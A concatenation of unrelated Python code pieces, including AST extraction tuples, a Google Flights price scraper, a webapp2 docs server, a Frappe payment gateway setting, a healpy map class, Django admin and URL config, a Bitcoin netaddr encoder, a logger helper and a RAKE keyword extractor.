'numpy.reshape', 'np.reshape', (['seq', '(1, -1)'], {}), '(seq, (1, -1))\n', (56999, 57013), True, 'import numpy as np\n'), ((57421, 57454), 'tensorflow.train.BytesList', 'tf.train.BytesList', ([], {'value': '[value]'}), '(value=[value])\n', (57439, 57454), True, 'import tensorflow as tf\n'), ((57537, 57570), 'tensorflow.train.FloatList', 'tf.train.FloatList', ([], {'value': '[value]'}), '(value=[value])\n', (57555, 57570), True, 'import tensorflow as tf\n'), ((57653, 57686), 'tensorflow.train.Int64List', 'tf.train.Int64List', ([], {'value': '[value]'}), '(value=[value])\n', (57671, 57686), True, 'import tensorflow as tf\n'), ((58583, 58622), 'os.path.basename', 'os.path.basename', (['self._opts._traindata'], {}), '(self._opts._traindata)\n', (58599, 58622), False, 'import re, os\n'), ((58897, 58936), 'os.path.basename', 'os.path.basename', (['self._opts._validdata'], {}), '(self._opts._validdata)\n', (58913, 58936), False, 'import re, os\n'), ((68428, 68451), 'tensorflow.name_scope', 'tf.name_scope', (['"""stddev"""'], {}), "('stddev')\n", (68441, 68451), True, 'import tensorflow as tf\n'), ((68634, 68652), 'tensorflow.reduce_max', 'tf.reduce_max', (['var'], {}), '(var)\n', (68647, 68652), True, 'import tensorflow as tf\n'), ((68715, 68733), 'tensorflow.reduce_min', 'tf.reduce_min', (['var'], {}), '(var)\n', (68728, 68733), True, 'import tensorflow as tf\n'), ((25949, 25980), 'numpy.reshape', 'np.reshape', (['seq_matrix', '(1, -1)'], {}), '(seq_matrix, (1, -1))\n', (25959, 25980), True, 'import numpy as np\n'), ((31082, 31103), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (31096, 31103), False, 'import random\n'), ((31549, 31570), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (31563, 31570), False, 'import random\n'), ((31677, 31698), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (31691, 31698), False, 'import random\n'), ((49352, 49383), 'numpy.reshape', 'np.reshape', (['seq_matrix', '(1, -1)'], {}), '(seq_matrix, (1, -1))\n', (49362, 49383), True, 'import numpy as np\n'), ((56081, 56102), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (56095, 56102), False, 'import random\n'), ((56548, 56569), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 
19)\n', (56562, 56569), False, 'import random\n'), ((56676, 56697), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (56690, 56697), False, 'import random\n'), ((59353, 59407), 'os.path.join', 'os.path.join', (['self._opts._batchesdir', 'batch_files_name'], {}), '(self._opts._batchesdir, batch_files_name)\n', (59365, 59407), False, 'import re, os\n'), ((59833, 59869), 'numpy.zeros', 'np.zeros', (['[self._opts._windowlength]'], {}), '([self._opts._windowlength])\n', (59841, 59869), True, 'import numpy as np\n'), ((62176, 62191), 'numpy.asarray', 'np.asarray', (['[0]'], {}), '([0])\n', (62186, 62191), True, 'import numpy as np\n'), ((62246, 62283), 'numpy.expand_dims', 'np.expand_dims', (['garbage_label'], {'axis': '(0)'}), '(garbage_label, axis=0)\n', (62260, 62283), True, 'import numpy as np\n'), ((68501, 68522), 'tensorflow.square', 'tf.square', (['(var - mean)'], {}), '(var - mean)\n', (68510, 68522), True, 'import tensorflow as tf\n')] |
#!/usr/bin/env python3
from time import sleep
import datetime
from selenium import webdriver
from bs4 import BeautifulSoup
import sqlite3
DATEFORMAT = '%Y-%m-%d'
def buildQueryURL(fr, to, date, currency):
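    # build the Google Flights query URL for the given route, travel date and currency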
url = 'https://www.google.com/flights?hl=se&gl=se#flt={fr}.{to}.{date};c:{currency};e:1;s:0;sd:1;t:f;tt:o'
url = url.format(fr = fr, to = to, date = date, currency = currency)
return url
def getHTML(url):
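    # fetch the page with a headless Chrome instance and return the rendered page source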
options = webdriver.ChromeOptions()
options.add_argument('headless')
options.add_argument('no-sandbox')
driver = webdriver.Chrome(chrome_options = options)
driver.get(url)
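    # wait briefly so the dynamically loaded flight results can finish rendering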
sleep(2)
html = driver.page_source
driver.quit()
return html
def parseFlights(html, date):
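    # yield one dict per flight parsed from the Google Flights result list items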
def parsePrice(price):
return ''.join([i for i in price if i.isdigit()])
def parseTimes(times, date):
return [datetime.datetime.strptime(date + '-' + time.strip(), DATEFORMAT + '-%H:%M') for time in times.split('–')]
flightsSoup = BeautifulSoup(html, features = 'html.parser')
for flight in flightsSoup.find_all('li', class_ = 'gws-flights-results__result-item'):
times = parseTimes(flight.find('div', class_ = 'gws-flights-results__times').text, date)
priceObj = flight.find('div', class_ = 'gws-flights-results__price')
yield {
'flightId': flight['data-fp'],
'flightDate': datetime.datetime.strptime(date, DATEFORMAT),
'departure': times[0],
'arrival': times[1],
'duration': flight.find('div', class_ = 'gws-flights-results__duration').text,
'price': -1 if (priceObj is None) else parsePrice(priceObj.text),
'timestamp': datetime.datetime.now()
}
def connectDB(dbName):
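    # open the SQLite database and create the flights table if it does not exist yet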
db = sqlite3.connect(dbName)
cur = db.cursor()
cur.execute('''
CREATE TABLE IF NOT EXISTS flights(
id INTEGER PRIMARY KEY AUTOINCREMENT,
flightId TEXT,
flightDate DATETIME,
departure DATETIME,
arrival DATETIME,
duration TEXT,
price INTEGER,
timestamp DATETIME)
''')
db.commit()
return db
def writeFlights(db, flights):
cur = db.cursor()
for flight in flights:
print('Writing to db...\n', flight)
cur.execute('''
INSERT INTO flights(flightId, flightDate, departure, arrival, duration, price, timestamp)
VALUES(:flightId, :flightDate, :departure, :arrival, :duration, :price, :timestamp)
''', flight)
db.commit()
def main():
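    # walk day by day from today to the end of the range, scraping ARN -> FRA prices into the database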
dateRange = [datetime.datetime.now().strftime(DATEFORMAT), '2020-12-31']
dateRangeDateFormat = [datetime.datetime.strptime(date, DATEFORMAT) for date in dateRange]
currentDate = dateRangeDateFormat[0]
while (currentDate <= dateRangeDateFormat[1]):
date = currentDate.strftime(DATEFORMAT)
url = buildQueryURL('ARN', 'FRA', date, 'SEK')
print('Scraping', url)
html = getHTML(url)
flights = parseFlights(html, date)
db = connectDB('./db/flights.sqlite')
with db:
writeFlights(db, flights)
currentDate += datetime.timedelta(days = 1)
if __name__ == '__main__':
main()
| [
"selenium.webdriver.ChromeOptions",
"sqlite3.connect",
"datetime.datetime.strptime",
"selenium.webdriver.Chrome",
"time.sleep",
"bs4.BeautifulSoup",
"datetime.datetime.now",
"datetime.timedelta"
] | [((434, 459), 'selenium.webdriver.ChromeOptions', 'webdriver.ChromeOptions', ([], {}), '()\n', (457, 459), False, 'from selenium import webdriver\n'), ((543, 583), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'chrome_options': 'options'}), '(chrome_options=options)\n', (559, 583), False, 'from selenium import webdriver\n'), ((606, 614), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (611, 614), False, 'from time import sleep\n'), ((953, 996), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html'], {'features': '"""html.parser"""'}), "(html, features='html.parser')\n", (966, 996), False, 'from bs4 import BeautifulSoup\n'), ((1662, 1685), 'sqlite3.connect', 'sqlite3.connect', (['dbName'], {}), '(dbName)\n', (1677, 1685), False, 'import sqlite3\n'), ((2481, 2525), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date', 'DATEFORMAT'], {}), '(date, DATEFORMAT)\n', (2507, 2525), False, 'import datetime\n'), ((2928, 2954), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (2946, 2954), False, 'import datetime\n'), ((1323, 1367), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date', 'DATEFORMAT'], {}), '(date, DATEFORMAT)\n', (1349, 1367), False, 'import datetime\n'), ((1601, 1624), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1622, 1624), False, 'import datetime\n'), ((2396, 2419), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2417, 2419), False, 'import datetime\n')] |
import os
import re
import jinja2
import webapp2
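# Jinja environment with non-default '{{{{' / '}}}}' delimiters, so a literal '{{ ... }}' in the templates is not expanded by Jinja.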
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
variable_start_string='{{{{',
variable_end_string='}}}}',
autoescape=True)
redirects = [
(r'/api/([^/]*)/lit_html', r'/api/\1/_lit_html_'),
(r'/api/([^/]*)/shady_render', r'/api/\1/_lib_shady_render_')
]
# Match HTML pages from path; similar to behavior of Jekyll on GitHub Pages.
def find_template(path):
if path.endswith('/'):
# / -> /index.html, /try/ -> /try/index.html
return JINJA_ENVIRONMENT.get_template(path + 'index.html')
elif path.endswith('.html'):
# /index.html, /try/create.html
return JINJA_ENVIRONMENT.get_template(path)
try:
# /try/create -> /try/create.html
return JINJA_ENVIRONMENT.get_template(path + '.html')
except jinja2.exceptions.TemplateNotFound:
pass
# /try -> /try/index.html
return JINJA_ENVIRONMENT.get_template(path + '/index.html')
class MainPage(webapp2.RequestHandler):
def get(self):
try:
template = find_template(self.request.path)
self.response.headers['Cache-Control'] = 'public, max-age=60'
except jinja2.exceptions.TemplateNotFound:
template = find_template('/404.html')
self.response.set_status(404)
except Exception:
template = find_template('/500.html')
self.response.set_status(500)
self.response.write(template.render({}))
# Serve redirects for old paths, otherwise just serve static files
class ApiDoc(webapp2.RequestHandler):
def redirect_if_needed(self, path):
for redirect in redirects:
pattern = redirect[0]
replace = redirect[1]
if re.match(pattern, path):
self.redirect(re.sub(pattern, replace, path), permanent=True)
return True
return False
def get(self):
if self.redirect_if_needed(self.request.path):
return
try:
# path is always absolute starting with /api/. Slice off the leading slash
# and normalize it relative to cwd
filepath = os.path.relpath(self.request.path[1:])
page = open(filepath, 'rb').read()
self.response.write(page)
except Exception:
template = find_template('/404.html')
self.response.set_status(404)
self.response.write(template.render({}))
app = webapp2.WSGIApplication([
('/api/.*', ApiDoc),
('/.*', MainPage),
])
| [
"re.match",
"os.path.dirname",
"webapp2.WSGIApplication",
"re.sub",
"os.path.relpath"
] | [((2340, 2405), 'webapp2.WSGIApplication', 'webapp2.WSGIApplication', (["[('/api/.*', ApiDoc), ('/.*', MainPage)]"], {}), "([('/api/.*', ApiDoc), ('/.*', MainPage)])\n", (2363, 2405), False, 'import webapp2\n'), ((123, 148), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (138, 148), False, 'import os\n'), ((1708, 1731), 're.match', 're.match', (['pattern', 'path'], {}), '(pattern, path)\n', (1716, 1731), False, 'import re\n'), ((2071, 2109), 'os.path.relpath', 'os.path.relpath', (['self.request.path[1:]'], {}), '(self.request.path[1:])\n', (2086, 2109), False, 'import os\n'), ((1755, 1785), 're.sub', 're.sub', (['pattern', 'replace', 'path'], {}), '(pattern, replace, path)\n', (1761, 1785), False, 'import re\n')] |
# Copyright (c) 2022, kinkusuma and contributors
# For license information, please see license.txt
import frappe
from frappe.model.document import Document
from frappe import _
import json
from urllib.parse import urlencode
from frappe.utils import get_url, call_hook_method, cint, flt
from frappe.integrations.utils import make_get_request, make_post_request, create_request_log, create_payment_gateway
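# Settings DocType for a single Xendit gateway account; saving it (re)creates and enables the matching Payment Gateway record.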
class xenditsettings(Document):
supported_currency = 'IDR'
def on_update(self):
create_payment_gateway('Xendit-' + self.gateway_name, settings='Xendit Settings', controller=self.gateway_name)
call_hook_method('payment_gateway_enabled', gateway='Xendit-' + self.gateway_name)
def validate_transaction_currency(self, currency):
if currency != self.supported_currency:
frappe.throw(_("Currency '{0}' is not supported").format(currency))
def get_payment_url(self, **kwargs):
return get_url("./xendit/checkout?{0}".format(urlencode(kwargs)))
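# Helper used by the checkout flow to find which Xendit Settings document backs the Payment Gateway referenced by a document.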
def get_gateway_controller(doctype, docname):
reference_doc = frappe.get_doc(doctype, docname)
gateway_controller = frappe.db.get_value("Payment Gateway", reference_doc.payment_gateway, "gateway_controller")
return gateway_controller
| [
"frappe.db.get_value",
"frappe._",
"frappe.utils.call_hook_method",
"frappe.get_doc",
"urllib.parse.urlencode",
"frappe.integrations.utils.create_payment_gateway"
] | [((1025, 1057), 'frappe.get_doc', 'frappe.get_doc', (['doctype', 'docname'], {}), '(doctype, docname)\n', (1039, 1057), False, 'import frappe\n'), ((1080, 1175), 'frappe.db.get_value', 'frappe.db.get_value', (['"""Payment Gateway"""', 'reference_doc.payment_gateway', '"""gateway_controller"""'], {}), "('Payment Gateway', reference_doc.payment_gateway,\n 'gateway_controller')\n", (1099, 1175), False, 'import frappe\n'), ((491, 607), 'frappe.integrations.utils.create_payment_gateway', 'create_payment_gateway', (["('Xendit-' + self.gateway_name)"], {'settings': '"""Xendit Settings"""', 'controller': 'self.gateway_name'}), "('Xendit-' + self.gateway_name, settings=\n 'Xendit Settings', controller=self.gateway_name)\n", (513, 607), False, 'from frappe.integrations.utils import make_get_request, make_post_request, create_request_log, create_payment_gateway\n'), ((605, 692), 'frappe.utils.call_hook_method', 'call_hook_method', (['"""payment_gateway_enabled"""'], {'gateway': "('Xendit-' + self.gateway_name)"}), "('payment_gateway_enabled', gateway='Xendit-' + self.\n gateway_name)\n", (621, 692), False, 'from frappe.utils import get_url, call_hook_method, cint, flt\n'), ((941, 958), 'urllib.parse.urlencode', 'urlencode', (['kwargs'], {}), '(kwargs)\n', (950, 958), False, 'from urllib.parse import urlencode\n'), ((799, 835), 'frappe._', '_', (['"""Currency \'{0}\' is not supported"""'], {}), '("Currency \'{0}\' is not supported")\n', (800, 835), False, 'from frappe import _\n')] |
"""
LMap - a skymap of likelihoods.
The map will be stored in self.map, and is in nested order.
"""
import logging
import numbers
import collections
import numpy as np
import healpy as hp
class LMap:
def __init__(self, a=0):
if isinstance(a, numbers.Number):
if a == 0:
self.map = np.ones(hp.nside2npix(2)) # placeholder
else:
# interpret as nside
self.map = np.ones(hp.nside2npix(a))
elif isinstance(a, (collections.Sequence, np.ndarray)):
self.map = np.array(a)
else:
logging.error('LMap.__init__: unrecognized type')
self.map = np.ones(hp.nside2npix(2)) # placeholder
def clear(self):
self.map = np.ones(len(self.map))
def copy(self):
return LMap(self.map.copy())
def combine(self, other):
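        # bring both maps to a common nside (regridding the coarser one) before multiplying pixel-wise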
if len(self.map) > len(other):
nside = hp.npix2nside(len(self.map))
ma = hp.ud_grade(np.array(other), nside,
                             order_in='NESTED', order_out='NESTED')
elif len(self.map) < len(other):
nside = hp.npix2nside(len(other))
self.map = hp.ud_grade(np.array(self.map), nside,
                                    order_in='NESTED', order_out='NESTED')
ma = other
else:
ma = np.array(other)
self.map *= ma
| [
"numpy.array",
"logging.error",
"healpy.nside2npix"
] | [((503, 514), 'numpy.array', 'np.array', (['a'], {}), '(a)\n', (511, 514), True, 'import numpy as np\n'), ((531, 580), 'logging.error', 'logging.error', (['"""LMap.__init__: unrecognized type"""'], {}), "('LMap.__init__: unrecognized type')\n", (544, 580), False, 'import logging\n'), ((878, 893), 'numpy.array', 'np.array', (['other'], {}), '(other)\n', (886, 893), True, 'import numpy as np\n'), ((1203, 1218), 'numpy.array', 'np.array', (['other'], {}), '(other)\n', (1211, 1218), True, 'import numpy as np\n'), ((308, 324), 'healpy.nside2npix', 'hp.nside2npix', (['(2)'], {}), '(2)\n', (321, 324), True, 'import healpy as hp\n'), ((408, 424), 'healpy.nside2npix', 'hp.nside2npix', (['a'], {}), '(a)\n', (421, 424), True, 'import healpy as hp\n'), ((606, 622), 'healpy.nside2npix', 'hp.nside2npix', (['(2)'], {}), '(2)\n', (619, 622), True, 'import healpy as hp\n'), ((1070, 1088), 'numpy.array', 'np.array', (['self.map'], {}), '(self.map)\n', (1078, 1088), True, 'import numpy as np\n')] |
import os
def ensure_dir(path):
if not os.path.exists(path):
os.makedirs(path)
def get_instance(module, name, config, *args):
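    # instantiate the class named in config[name]['type'] from the given module, passing config[name]['args'] as keyword arguments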
return getattr(module, config[name]['type'])(*args, **config[name]['args'])
def freeze_network(network):
for p in network.parameters():
p.requires_grad = False
def unfreeze_network(network):
for p in network.parameters():
p.requires_grad = True
| [
"os.path.exists",
"os.makedirs"
] | [((45, 65), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (59, 65), False, 'import os\n'), ((75, 92), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (86, 92), False, 'import os\n')] |
from django.contrib import admin
from modeltranslation.admin import TabbedTranslationAdmin
from .models import Person, Office, Tag
class PersonAdmin(TabbedTranslationAdmin):
list_display = ('name', 'surname', 'security_level', 'gender')
list_filter = ('security_level', 'tags', 'office', 'name', 'gender')
actions = ['copy_100']
def copy_100(self, request, queryset):
for item in queryset.all():
item.populate()
copy_100.short_description = 'Copy 100 objects with random data'
class PersonStackedInline(admin.TabularInline):
model = Person
extra = 0
class OfficeAdmin(admin.ModelAdmin):
inlines = (PersonStackedInline,)
list_display = ('office', 'address')
class TagAdmin(admin.ModelAdmin):
list_display = ('name',)
admin.site.register(Person, PersonAdmin)
admin.site.register(Office, OfficeAdmin)
admin.site.register(Tag, TagAdmin)
| [
"django.contrib.admin.site.register"
] | [((791, 831), 'django.contrib.admin.site.register', 'admin.site.register', (['Person', 'PersonAdmin'], {}), '(Person, PersonAdmin)\n', (810, 831), False, 'from django.contrib import admin\n'), ((832, 872), 'django.contrib.admin.site.register', 'admin.site.register', (['Office', 'OfficeAdmin'], {}), '(Office, OfficeAdmin)\n', (851, 872), False, 'from django.contrib import admin\n'), ((873, 907), 'django.contrib.admin.site.register', 'admin.site.register', (['Tag', 'TagAdmin'], {}), '(Tag, TagAdmin)\n', (892, 907), False, 'from django.contrib import admin\n')] |
#!/usr/bin/python3
from __future__ import absolute_import, division, print_function
import six
import context
import unittest
from acsemble.phantom import Phantom2d
from acsemble import maia
from acsemble import projection
import os
import numpy as np
from acsemble import config
def setup_module():
config.config_init()
PATH_HERE = os.path.abspath(os.path.dirname(__file__))
GOLOSIO_MAP = os.path.join(PATH_HERE, '..', 'acsemble', 'data', 'golosio_100.png')
YAMLFILE = os.path.join(PATH_HERE, '..', 'acsemble', 'data', 'golosio.yaml')
class OutgoingPhotonEnergyTests(unittest.TestCase):
def setUp(self):
self.phantom = Phantom2d(filename=GOLOSIO_MAP, yamlfile=YAMLFILE)
self.maia_d = maia.Maia()
def test_fluoro(self):
energy = projection.outgoing_photon_energy(
event_type = 'fluoro',
p = self.phantom,
q = 199, # outer corner
maia_d = self.maia_d,
el = 'Fe' # K_alpha is 6.398
)
self.assertAlmostEqual(energy, 6.398, places=2)
@unittest.skip
def test_rayleigh(self):
energy = projection.outgoing_photon_energy(
event_type = 'rayleigh',
p = self.phantom,
q = 199, # outer corner
maia_d=self.maia_d,
)
self.assertAlmostEqual(energy, self.phantom.energy)
@unittest.skip
def test_compton(self):
energy_outer = projection.outgoing_photon_energy(
event_type = 'compton',
p = self.phantom,
q = 199, # outer corner
maia_d=self.maia_d,
)
energy_inner = projection.outgoing_photon_energy(
event_type = 'compton',
p = self.phantom,
q = 248, # inner corner
maia_d=self.maia_d,
)
self.assertTrue(energy_outer > energy_inner) # because backscatter
self.assertTrue(energy_outer < self.phantom.energy)
# self.assertAlmostEqual(energy_outer, 14.324, places=3) # Maia Rev A
self.assertAlmostEqual(energy_outer, 14.282, places=3) # For Maia Rev C
def tearDown(self):
del self.phantom
del self.maia_d
if __name__ == "__main__" :
import sys
from numpy.testing import run_module_suite
run_module_suite(argv=sys.argv)
| [
"os.path.join",
"acsemble.config.config_init",
"acsemble.maia.Maia",
"os.path.dirname",
"acsemble.phantom.Phantom2d",
"numpy.testing.run_module_suite",
"acsemble.projection.outgoing_photon_energy"
] | [((397, 465), 'os.path.join', 'os.path.join', (['PATH_HERE', '""".."""', '"""acsemble"""', '"""data"""', '"""golosio_100.png"""'], {}), "(PATH_HERE, '..', 'acsemble', 'data', 'golosio_100.png')\n", (409, 465), False, 'import os\n'), ((477, 542), 'os.path.join', 'os.path.join', (['PATH_HERE', '""".."""', '"""acsemble"""', '"""data"""', '"""golosio.yaml"""'], {}), "(PATH_HERE, '..', 'acsemble', 'data', 'golosio.yaml')\n", (489, 542), False, 'import os\n'), ((305, 325), 'acsemble.config.config_init', 'config.config_init', ([], {}), '()\n', (323, 325), False, 'from acsemble import config\n'), ((356, 381), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (371, 381), False, 'import os\n'), ((2308, 2339), 'numpy.testing.run_module_suite', 'run_module_suite', ([], {'argv': 'sys.argv'}), '(argv=sys.argv)\n', (2324, 2339), False, 'from numpy.testing import run_module_suite\n'), ((641, 691), 'acsemble.phantom.Phantom2d', 'Phantom2d', ([], {'filename': 'GOLOSIO_MAP', 'yamlfile': 'YAMLFILE'}), '(filename=GOLOSIO_MAP, yamlfile=YAMLFILE)\n', (650, 691), False, 'from acsemble.phantom import Phantom2d\n'), ((714, 725), 'acsemble.maia.Maia', 'maia.Maia', ([], {}), '()\n', (723, 725), False, 'from acsemble import maia\n'), ((771, 882), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""fluoro"""', 'p': 'self.phantom', 'q': '(199)', 'maia_d': 'self.maia_d', 'el': '"""Fe"""'}), "(event_type='fluoro', p=self.phantom, q=\n 199, maia_d=self.maia_d, el='Fe')\n", (804, 882), False, 'from acsemble import projection\n'), ((1127, 1231), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""rayleigh"""', 'p': 'self.phantom', 'q': '(199)', 'maia_d': 'self.maia_d'}), "(event_type='rayleigh', p=self.phantom, q=\n 199, maia_d=self.maia_d)\n", (1160, 1231), False, 'from acsemble import projection\n'), ((1445, 1548), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""compton"""', 'p': 'self.phantom', 'q': '(199)', 'maia_d': 'self.maia_d'}), "(event_type='compton', p=self.phantom, q=\n 199, maia_d=self.maia_d)\n", (1478, 1548), False, 'from acsemble import projection\n'), ((1654, 1757), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""compton"""', 'p': 'self.phantom', 'q': '(248)', 'maia_d': 'self.maia_d'}), "(event_type='compton', p=self.phantom, q=\n 248, maia_d=self.maia_d)\n", (1687, 1757), False, 'from acsemble import projection\n')] |
from rest_framework.response import Response
from django.core import serializers
class SessionResponseMixin(object):
'''
Class: SessionResponseMixin:
Arguments:
- Object: mixin object
    Definition:
        Creates the object that is returned as the response
        to the client request.
    Return params:
        - Response: contains the JSON data and the status of the request.
'''
def render_to_response(self, user, token, status, error, token_expiry=None):
response_data = dict(id=None, username='', email='', first_name='', last_name='', profile='', is_authenticated=False,
is_admin=False, token=token, error=error, token_expiry=token_expiry)
if user:
profile = dict()
if hasattr(user, 'profile'):
profile = user.profile.getObject()
response_data = dict(id=user.id, username=user.username, profile=profile, email=user.email, first_name=user.first_name, last_name=user.last_name, is_authenticated=user.is_authenticated,
is_admin=user.is_superuser, token=token, error=error, token_expiry=token_expiry)
return Response(response_data, status)
| [
"rest_framework.response.Response"
] | [((1223, 1254), 'rest_framework.response.Response', 'Response', (['response_data', 'status'], {}), '(response_data, status)\n', (1231, 1254), False, 'from rest_framework.response import Response\n')] |
import logging
def get_logger(name: str, logfile: str = "log.txt") -> logging.Logger:
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
    # create the file handler (writes full debug output to the given log file)
file_handler = logging.FileHandler(logfile)
file_handler.setLevel(logging.DEBUG)
file_handler_formatter = logging.Formatter(
"%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(message)s"
)
file_handler.setFormatter(file_handler_formatter)
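    # console handler: echo records to the terminal with a shorter timestamp format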
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.DEBUG)
console_handler_formatter = logging.Formatter(
"%(asctime)s.%(msecs)-3d - %(levelname)s - %(message)s",
"%Y-%m-%d %H:%M:%S",
)
console_handler.setFormatter(console_handler_formatter)
logger.addHandler(file_handler)
logger.addHandler(console_handler)
return logger
| [
"logging.getLogger",
"logging.Formatter",
"logging.StreamHandler",
"logging.FileHandler"
] | [((101, 124), 'logging.getLogger', 'logging.getLogger', (['name'], {}), '(name)\n', (118, 124), False, 'import logging\n'), ((198, 226), 'logging.FileHandler', 'logging.FileHandler', (['logfile'], {}), '(logfile)\n', (217, 226), False, 'import logging\n'), ((297, 394), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(message)s"""'], {}), "(\n '%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(message)s')\n", (314, 394), False, 'import logging\n'), ((481, 504), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (502, 504), False, 'import logging\n'), ((581, 680), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s.%(msecs)-3d - %(levelname)s - %(message)s"""', '"""%Y-%m-%d %H:%M:%S"""'], {}), "('%(asctime)s.%(msecs)-3d - %(levelname)s - %(message)s',\n '%Y-%m-%d %H:%M:%S')\n", (598, 680), False, 'import logging\n')] |
from django.urls import path
from . import views
from . import gviews
app_name='polls'
urlpatterns = [
# ex: /polls/
path('', views.index, name='index'),
# ex: /polls/5/
path('<int:question_id>/', views.detail, name='detail'),
# ex: /polls/5/results/
path('<int:question_id>/results/', views.results, name='results'),
# ex: /polls/5/vote/
path('<int:question_id>/vote/', views.vote, name='vote'),
path('v2/', gviews.IndexView.as_view(), name='index'),
path('v2/<int:pk>/', gviews.DetailView.as_view(), name='detail'),
path('v2/<int:pk>/results/', gviews.ResultsView.as_view(), name='results'),
path('v2/<int:question_id>/vote/', gviews.vote, name='vote'),
] | [
"django.urls.path"
] | [((128, 163), 'django.urls.path', 'path', (['""""""', 'views.index'], {'name': '"""index"""'}), "('', views.index, name='index')\n", (132, 163), False, 'from django.urls import path\n'), ((189, 244), 'django.urls.path', 'path', (['"""<int:question_id>/"""', 'views.detail'], {'name': '"""detail"""'}), "('<int:question_id>/', views.detail, name='detail')\n", (193, 244), False, 'from django.urls import path\n'), ((278, 343), 'django.urls.path', 'path', (['"""<int:question_id>/results/"""', 'views.results'], {'name': '"""results"""'}), "('<int:question_id>/results/', views.results, name='results')\n", (282, 343), False, 'from django.urls import path\n'), ((374, 430), 'django.urls.path', 'path', (['"""<int:question_id>/vote/"""', 'views.vote'], {'name': '"""vote"""'}), "('<int:question_id>/vote/', views.vote, name='vote')\n", (378, 430), False, 'from django.urls import path\n'), ((646, 706), 'django.urls.path', 'path', (['"""v2/<int:question_id>/vote/"""', 'gviews.vote'], {'name': '"""vote"""'}), "('v2/<int:question_id>/vote/', gviews.vote, name='vote')\n", (650, 706), False, 'from django.urls import path\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import struct
from socket import inet_aton, inet_ntoa
from typing import NamedTuple
from .Struct import Struct
Payload = NamedTuple('Payload', (('ip', str), ('port', int), ('services', int)))
class Netaddr(Payload, Struct):
"""
Network address structure for use in Bitcoin protocol messages
.. Network address structure in Bitcoin wiki:
https://en.bitcoin.it/wiki/Protocol_documentation#Network_address
"""
def __str__(self) -> str:
return 'netaddr:({ip}:{port}, s: {s:b})'.format(ip=self.ip,
port=self.port,
s=self.services,)
def __repr__(self) -> str:
return str(self)
def encode(self) -> bytes:
"""
Encode object ot Bitcoin's netaddr structure
Returns
-------
bytes
encoded message
"""
p = bytearray() # type: bytearray
p.extend(struct.pack('<q', self.services))
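        # 10 zero bytes followed by 0xff 0xff: the IPv4-mapped IPv6 prefix used for the 16-byte address field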
p.extend(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff')
p.extend(struct.pack('>4sH', inet_aton(self.ip), self.port))
return bytes(p)
@staticmethod
def decode(n: bytes) -> Payload:
"""
Decode netaddr from bytes
Parameters
----------
n : bytes
netaddr structure to decode
Returns
-------
NamedTuple (Payload)
NamedTuple with all parsed fields (services, ipaddr, port)
"""
services = struct.unpack('<Q', n[:8])[0] # type: int
(addr, port) = struct.unpack('>4sH', n[-6:]) # type: bytes, int
        ip = inet_ntoa(addr)  # type: str
return Payload(ip=ip, port=port, services=services)
| [
"struct.pack",
"struct.unpack",
"socket.inet_aton",
"socket.inet_ntoa",
"typing.NamedTuple"
] | [((171, 241), 'typing.NamedTuple', 'NamedTuple', (['"""Payload"""', "(('ip', str), ('port', int), ('services', int))"], {}), "('Payload', (('ip', str), ('port', int), ('services', int)))\n", (181, 241), False, 'from typing import NamedTuple\n'), ((1663, 1692), 'struct.unpack', 'struct.unpack', (['""">4sH"""', 'n[-6:]'], {}), "('>4sH', n[-6:])\n", (1676, 1692), False, 'import struct\n'), ((1726, 1741), 'socket.inet_ntoa', 'inet_ntoa', (['addr'], {}), '(addr)\n', (1735, 1741), False, 'from socket import inet_aton, inet_ntoa\n'), ((1028, 1060), 'struct.pack', 'struct.pack', (['"""<q"""', 'self.services'], {}), "('<q', self.services)\n", (1039, 1060), False, 'import struct\n'), ((1597, 1623), 'struct.unpack', 'struct.unpack', (['"""<Q"""', 'n[:8]'], {}), "('<Q', n[:8])\n", (1610, 1623), False, 'import struct\n'), ((1169, 1187), 'socket.inet_aton', 'inet_aton', (['self.ip'], {}), '(self.ip)\n', (1178, 1187), False, 'from socket import inet_aton, inet_ntoa\n')] |
from rake_nltk import Rake
import nltk
from nltk.stem import WordNetLemmatizer
from qualkit.stopwords import stopwords
nltk.download('wordnet')
# initiate nltk lemmatiser
lemma = WordNetLemmatizer()
r = Rake(stopwords=stopwords, min_length=1, max_length=4)
def rake_implement(x, r):
r.extract_keywords_from_text(x)
return r.get_ranked_phrases()
def add_keywords(df, column):
df = df.copy()
df['keywords'] = df[column].apply(lambda x: rake_implement(x, r))
